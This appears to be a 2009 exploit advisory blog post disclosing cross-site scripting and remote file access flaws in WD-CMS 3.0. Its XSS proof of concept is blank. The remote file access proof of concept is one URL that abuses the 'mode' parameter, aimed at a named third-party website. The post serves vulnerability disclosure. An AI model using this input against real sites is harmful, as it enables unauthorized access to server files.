WD-CMS 3.0 Multiple Vulnerabilities

# Exploit Title: WD-CMS 3.0 Multiple Vulnerabilities
# Date: December 31st, 2009
# Author: Sora
# Software Link: http://www.webdiamond.net/cms.html
# Version: 3.0
# Tested on: Windows Vista and Linux (Backtrack 3)

> WD-CMS 3.0 Multiple Vulnerabilities
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/

# Program Description:
Based on a flexible PHP architecture, Web Diamond has developed a 100% browser-based database-driven Content Management System (CMS), which allows users to maintain full control of their website without any technical knowledge of programming by using a simple user friendly admin panel. The main benefit and the flexible strength of our CMS is its ability to separate design, structure and content. Each area of the site can be recreated and adjusted independent of the other areas.

Key features include:

1. User friendly secure admin interface

2. Access levels

3. Powerful File Manager
4. Multi languages
5. Dynamic templates
6. Search engine friendly
7. Site tools
8. Add-on modules

# Vulnerability Description:
The CMS named WD-CMS developed by Web Diamond LTD has multiple vulnerabilities.

Vulnerabilities: XSS and remote file access.


# Code/Proof of Concept (PoC):

XSS Proof of Concept:

Remote File Access Proof of Concept:
http://www.openrad.com/index.php?l=eng&mode=./index (as it adds .php at the end)

# Greetz:
Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, Revelation, and Max Mafiotu!


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: